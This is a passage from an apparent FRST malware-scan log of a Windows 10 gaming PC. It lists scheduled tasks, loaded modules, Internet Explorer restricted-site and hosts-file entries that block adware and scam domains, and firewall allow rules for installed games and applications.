    Task: {F90E1ADE-C9DD-4465-8DAC-587FA30703FB} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-07-02] (Avast Software s.r.o.)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ==================== Loaded Modules (Whitelisted) ==============

    2015-07-10 21:00 - 2015-07-10 21:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
    2015-08-09 19:24 - 2015-08-09 19:24 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
    2015-05-15 16:26 - 2015-05-15 16:26 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
    2015-09-15 14:25 - 2015-09-15 14:25 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
    2015-08-19 18:35 - 2015-08-11 19:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
    2015-11-05 10:11 - 2015-11-05 10:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
    2014-09-10 18:09 - 2005-04-22 14:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
    2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
    2015-09-15 14:58 - 2015-09-15 14:58 - 08901184 _____ () D:\Microsoft Office 2013\Office15\1033\GrooveIntlResource.dll
    2015-10-01 14:23 - 2015-09-17 15:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
    2015-07-10 20:59 - 2015-07-10 20:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
    2015-12-15 18:55 - 2015-11-25 14:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2015-12-15 18:55 - 2015-11-25 14:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2015-12-15 18:55 - 2015-11-25 14:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2015-10-01 14:23 - 2015-09-17 15:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2015-07-10 21:00 - 2015-07-10 23:14 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
    2015-03-07 10:07 - 2015-03-07 10:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
    2015-07-02 10:28 - 2015-07-02 10:28 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
    2015-03-07 10:07 - 2015-03-07 10:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
    2015-07-02 10:28 - 2015-07-02 10:28 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
    2015-06-25 16:34 - 2015-06-25 16:34 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
    2015-06-25 16:37 - 2015-06-25 16:37 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
    2015-06-25 16:35 - 2015-06-25 16:35 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
    2015-06-25 16:38 - 2015-06-25 16:38 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
    2015-06-25 15:53 - 2015-06-25 15:53 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
    2015-06-25 15:51 - 2015-06-25 15:51 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
    2015-12-21 17:55 - 2015-12-21 17:55 - 00292352 _____ () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
    2015-07-02 13:20 - 2015-07-02 13:20 - 00104400 _____ () C:\Program Files\AVAST Software\Avast\log.dll
    2015-07-02 13:20 - 2015-07-02 13:20 - 00081728 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
    2016-03-01 12:14 - 2016-03-01 12:14 - 02835456 _____ () C:\Program Files\AVAST Software\Avast\defs\16022901\algo.dll
    2016-03-01 20:49 - 2016-03-01 20:49 - 02836480 _____ () C:\Program Files\AVAST Software\Avast\defs\16030100\algo.dll
    2016-02-28 18:50 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
    2016-02-28 18:50 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
    2016-02-28 18:50 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
    2016-02-28 18:50 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
    2016-02-26 06:50 - 2016-02-18 14:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
    2016-02-26 06:50 - 2016-02-18 14:14 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
    2015-02-19 13:47 - 2001-07-26 15:17 - 00692224 _____ () D:\Internode\libeay32.dll
    2015-02-19 13:47 - 2001-07-26 15:18 - 00151552 _____ () D:\Internode\ssleay32.dll
    2015-07-02 13:20 - 2015-07-02 13:20 - 40540672 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
    2015-11-16 20:48 - 2015-11-16 20:48 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 40622592 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libcef.dll
    2015-04-03 17:51 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 50656768 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libcef.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 01874944 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libglesv2.dll
    2016-01-02 16:45 - 2015-10-07 05:26 - 00075264 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzStats.Manager\cef\libegl.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 00911360 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libglesv2.dll
    2015-09-24 13:36 - 2015-08-28 07:30 - 00134144 _____ () C:\Users\Kym\AppData\Local\razer\InGameEngine\cache\RzSynapse\cef\libegl.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"

    ==================== EXE Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)

    IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
    IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
    IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
    IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
    IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
    IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
    IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
    IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
    IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
    IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
    IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
    IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
    IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
    IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
    IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
    IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
    IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
    IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
    IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
    IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

    There are 7870 more sites.

    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\007guard.com -> install.007guard.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008i.com -> 008i.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\008k.com -> www.008k.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\00hq.com -> www.00hq.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\010402.com -> 010402.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\0scan.com -> www.0scan.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-2005-search.com -> www.1-2005-search.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1-domains-registrations.com -> www.1-domains-registrations.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1000gratisproben.com -> www.1000gratisproben.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\1001namen.com -> www.1001namen.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100888290cs.com -> mir.100888290cs.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\100sexlinks.com -> www.100sexlinks.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\10sek.com -> www.10sek.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-26.net -> user1.12-26.net
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\12-27.net -> user1.12-27.net
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123fporn.info -> www.123fporn.info
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123moviedownload.com -> www.123moviedownload.com
    IE restricted site: HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\123simsen.com -> www.123simsen.com

    There are 7870 more sites.


    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-14 12:34 - 2016-02-28 21:02 - 00450902 ____R C:\WINDOWS\system32\Drivers\etc\hosts

    127.0.0.1 www.007guard.com
    127.0.0.1 007guard.com
    127.0.0.1 008i.com
    127.0.0.1 www.008k.com
    127.0.0.1 008k.com
    127.0.0.1 www.00hq.com
    127.0.0.1 00hq.com
    127.0.0.1 010402.com
    127.0.0.1 www.032439.com
    127.0.0.1 032439.com
    127.0.0.1 www.0scan.com
    127.0.0.1 0scan.com
    127.0.0.1 1000gratisproben.com
    127.0.0.1 www.1000gratisproben.com
    127.0.0.1 1001namen.com
    127.0.0.1 www.1001namen.com
    127.0.0.1 100888290cs.com
    127.0.0.1 www.100888290cs.com
    127.0.0.1 www.100sexlinks.com
    127.0.0.1 100sexlinks.com
    127.0.0.1 10sek.com
    127.0.0.1 www.10sek.com
    127.0.0.1 www.1-2005-search.com
    127.0.0.1 1-2005-search.com
    127.0.0.1 123fporn.info
    127.0.0.1 www.123fporn.info
    127.0.0.1 123haustiereundmehr.com
    127.0.0.1 www.123haustiereundmehr.com
    127.0.0.1 123moviedownload.com
    127.0.0.1 www.123moviedownload.com

    There are 15468 more lines.


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\Control Panel\Desktop\\Wallpaper -> c:\users\kym\appdata\local\packages\microsoft.windows.photos_8wekyb3d8bbwe\localstate\photosappbackground\20150215_012121688_ios.jpg
    DNS Servers: 8.8.8.8 - 8.8.4.4
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\StartupApproved\StartupFolder: => "Open Broadcaster Software (32bit) (2).lnk"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
    FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
    FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
    FirewallRules: [{48CEB542-655B-422A-B09D-BFDF5ACFC2DE}] => (Allow) D:\Microsoft Office 2013\Office15\outlook.exe
    FirewallRules: [{07CF4E87-E18E-4151-AF15-6E0D5A61CD56}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
    FirewallRules: [{E6424F0D-1043-4F45-ABB4-54594825877D}] => (Allow) D:\Microsoft Office 2013\Office15\UcMapi.exe
    FirewallRules: [{B087B5F1-8B72-4FCA-A5C4-EEF672EB226F}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
    FirewallRules: [{2E96B917-6E0A-4C39-8FAF-CF6991B7A9E9}] => (Allow) D:\Microsoft Office 2013\Office15\lync.exe
    FirewallRules: [{0A42A4D6-702C-4A20-AAA8-66BCB8F63F6A}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
    FirewallRules: [{CFA461BE-DE59-4B87-B67F-48577B41F94D}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
    FirewallRules: [{9B2F8065-74C1-4CF4-9AB6-785709683C8B}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
    FirewallRules: [{C93BD8EB-D0F0-4077-9B6B-DAC6C0EA78AA}] => (Allow) D:\Steam\SteamApps\common\dota 2 beta\game\bin\win32\dota2.exe
    FirewallRules: [{9A785830-F8A4-4C14-98FF-EA82E1D9D900}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
    FirewallRules: [{33391FC5-0E44-44F8-AD28-5F02628A1093}] => (Allow) D:\Steam\SteamApps\common\Left 4 Dead 2\left4dead2.exe
    FirewallRules: [{0A22C041-F41D-42C3-B571-A70B35DBF973}] => (Allow) LPort=54925
    FirewallRules: [UDP Query User{252EAFA3-7210-44C6-8374-ACA676045C0B}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
    FirewallRules: [TCP Query User{2877E791-1CCB-42A5-86E9-438A16014E27}C:\users\kym\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kym\appdata\roaming\spotify\spotify.exe
    FirewallRules: [UDP Query User{5F0F31E8-3F0B-46EB-B0D3-CA4A50E24B45}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
    FirewallRules: [TCP Query User{784D8C91-CAAD-4BAF-9AB8-C4D37B5348F8}D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe] => (Allow) D:\heroes of the storm\versions\base34190\heroesofthestorm_x64.exe
    FirewallRules: [{A3B20735-B836-4096-92B1-7F605DD53102}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{2E30376F-B970-46BD-8899-EB16CBD57F77}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{56C40FDB-D1D8-4300-9444-462D37777935}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
    FirewallRules: [{BB33C2C8-BD13-4B46-AB4B-945AB63AD76D}] => (Allow) D:\Steam\SteamApps\common\Marvel Heroes\UnrealEngine3\Binaries\Win64\MarvelHeroes2015.exe
    FirewallRules: [UDP Query User{181AB5DD-4B58-40DC-83A7-E0220CA18F90}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [TCP Query User{DF812EF1-9277-44ED-85D2-17CC01EE6A83}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [{86532A14-A6CC-4BFC-BD35-2C868592B80F}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
    FirewallRules: [{AB156E35-4ABB-46D8-9882-87F8777E7C40}] => (Allow) D:\Steam\SteamApps\common\Total War Rome II\launcher\launcher.exe
    FirewallRules: [{CB0E2CEA-ECBD-49C7-B03C-B09F6B9E5F82}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{4A7C1317-3631-4AA3-8955-49385287E4E4}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
    FirewallRules: [{E5F6F467-33E1-4473-8BF5-7B02CF2F6AE5}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{DD2E394F-C0A9-4BE1-8B27-F31AEDB8A861}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
    FirewallRules: [{FCBC243E-7F87-40E3-BDFE-602D2F7F8F84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{F85EFD68-AFA7-42E0-9EB7-24BC00055581}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
    FirewallRules: [{DC23B312-10EB-4DEC-96E0-43DA215B3471}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
    FirewallRules: [{1A7C934B-D0B9-45AC-A983-43FF06786E6D}] => (Allow) D:\Steam\SteamApps\common\DayZ\DayZ_BE.exe
    FirewallRules: [{E195526E-E66B-41A6-8D03-D693704045EA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
    FirewallRules: [{757BAA93-318B-49C6-A2AF-697C8B020683}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3478\Agent.exe
    FirewallRules: [UDP Query User{5A46E22D-A3AA-4D71-9164-4444349A2E37}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [TCP Query User{8D040A27-B2B3-48B2-AE4D-CF5A6B2B9575}D:\steam\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\steam\steamapps\common\awesomenauts\awesomenauts.exe
    FirewallRules: [{F2975338-B532-432A-8BB2-E7257A66FB37}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
    FirewallRules: [{A92059AE-40CC-4490-B046-D5E8EB1EA379}] => (Allow) D:\Steam\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
    FirewallRules: [{E73880A3-C095-497C-BB99-0FF4F9A222C4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
    FirewallRules: [{297EF2CF-1068-49B7-945F-7F71EA277019}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
    FirewallRules: [{4A156579-629D-40A0-AD60-DAF22460B1A0}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
    FirewallRules: [{895120DB-A4F1-47CE-9070-457BFAE3272C}] => (Allow) D:\Steam\SteamApps\common\Beyond Gravity\BeyondGravity.exe
    FirewallRules: [{AB2CC394-E9FE-498E-A877-0661AB134F15}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
    FirewallRules: [{9ECAEE5C-41DF-4173-9FD7-BF8A01B28AF5}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
    FirewallRules: [{0740F5E2-B69A-40E8-8DD2-D95CC993A671}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
    FirewallRules: [{BAF0FA59-C99C-4003-97DC-FE0050EAE7E6}] => (Allow) D:\Steam\SteamApps\common\Skyrim\SkyrimLauncher.exe
    FirewallRules: [{59C72BBD-55D5-46BB-9D94-83EC35F8C1E6}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
    FirewallRules: [{CDB3FF16-5E27-45A8-A944-246B3448C710}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3334\Agent.exe
    FirewallRules: [{15B898B7-E0CD-4607-B1C4-DCA61C30BAF4}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
    FirewallRules: [{F07CB940-6D92-4342-9696-AAD6C596DB2D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
    FirewallRules: [{759D3D16-BF79-4EB7-A210-0BE0F00D3DE2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
    FirewallRules: [{9BF516F4-E2B1-4F2F-A84D-B7092B2B122E}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
    FirewallRules: [{E1DBBBC1-157A-4212-B0D2-AA4DC1A3B620}] => (Allow) LPort=54925
    FirewallRules: [{2250328F-7FF9-4F66-94E8-EE8BCBBF5767}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
    FirewallRules: [{EF4512A5-DBBF-48C4-B269-B56A1B629D96}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3323\Agent.exe
    FirewallRules: [{5E0948FB-AB6B-4342-9299-E743A7E82CD5}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
    FirewallRules: [{24639D5A-3321-4183-A818-D896BC8761C8}] => (Allow) D:\Steam\SteamApps\common\Metro Last Light\MetroLL.exe
    FirewallRules: [{F9551992-B61C-4405-BC17-71BDF9CF57AD}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
    FirewallRules: [{4C4131C5-3599-4D91-8FDE-E5FC28727831}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3322\Agent.exe
    FirewallRules: [{E0C0796F-728A-4514-96B3-64E78C3581F7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
    FirewallRules: [{BFAD5EDC-8BE9-42A3-94D2-D4C8457134B0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3286\Agent.exe
    FirewallRules: [{F80F90B0-6FF0-4F96-9E65-E042003CE976}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
    FirewallRules: [{CE810206-FB49-40BF-B541-9EE0F88FCE29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3235\Agent.exe
    FirewallRules: [{F7CE0552-38B5-4F44-9E96-7E7CD1C904DF}] => (Allow) D:\Steam\bin\steamwebhelper.exe
    FirewallRules: [{B4DB672A-158E-45E5-B3B8-D4A3F5026452}] => (Allow) D:\Steam\bin\steamwebhelper.exe
    FirewallRules: [{F4BE57AB-8465-4DAD-8924-6FF609FD1D75}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
    FirewallRules: [{756ED978-037A-4F3D-A428-E87DAF9720E2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3182\Agent.exe
    FirewallRules: [UDP Query User{5C458673-1B35-424D-BAA3-78CAA5394D57}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
    FirewallRules: [TCP Query User{E50AE07B-9053-4BF0-89FE-8539B27A5423}C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe] => (Allow) C:\users\kym\desktop\teamspeak3-server_win64\ts3server_win64.exe
    FirewallRules: [{5D946922-67D2-47E1-8E89-CBFE1C6345B1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
    FirewallRules: [{4F7B44EC-2514-42B8-B292-F088413D9EEC}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3147\Agent.exe
    FirewallRules: [UDP Query User{CB540F47-8AB3-4B36-B34A-E3824B1FED40}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
    FirewallRules: [TCP Query User{FE0A9CD1-00B6-4747-9F1C-755ACCB4C879}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe
    FirewallRules: [{8E6EEA97-8D35-486D-B2B6-A2E9F8BF338C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
    FirewallRules: [{A3FE7E6A-1E6C-4E76-A75D-A4D1DCA0EDC0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3109\Agent.exe
    FirewallRules: [{769BECB0-54E0-47E7-9759-ECAF2E28273D}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
    FirewallRules: [{7B0D63B9-31A4-4ADB-8F22-69D31A83D9B8}] => (Allow) D:\Steam\SteamApps\common\Arma 3\arma3launcher.exe
    FirewallRules: [{3B9FA9A3-38E7-41D2-88A1-0BB43DE029BD}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
    FirewallRules: [{74A436A7-8819-4F18-8F60-716D8A0E357E}] => (Allow) D:\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
    FirewallRules: [{48B12E80-9B0D-46D9-A92C-7D542E713519}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
    FirewallRules: [{B1560556-55E2-42A6-A2E3-F65F2A7A5E97}] => (Allow) D:\Steam\SteamApps\common\BioShock Infinite\Binaries\Win32\BioShockInfinite.exe
    FirewallRules: [{75F5A6EB-BD39-4FE4-A690-4ABD347FD037}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{099743C1-9DF8-4750-949F-761AC80ABAC6}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\MP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{9F777184-4A13-4D03-A7C0-01D49AEABDDE}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{FCA495C1-8148-4FE6-A6C4-C517B16D4099}] => (Allow) D:\Steam\SteamApps\common\BioShock 2\SP\Builds\Binaries\Bioshock2Launcher.exe
    FirewallRules: [{1E57FFC8-E277-4527-A558-4E533468C4FD}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
    FirewallRules: [{FF7C891B-641F-403F-BDCB-015433DB2BB8}] => (Allow) D:\Steam\SteamApps\common\Bioshock\Builds\Release\Bioshock.exe
    FirewallRules: [{67B411DD-238B-4813-AF90-1F0C53336E41}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
    FirewallRules: [{0B80C1B4-520A-43F6-A486-2689BB9F4589}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.2880\Agent.exe
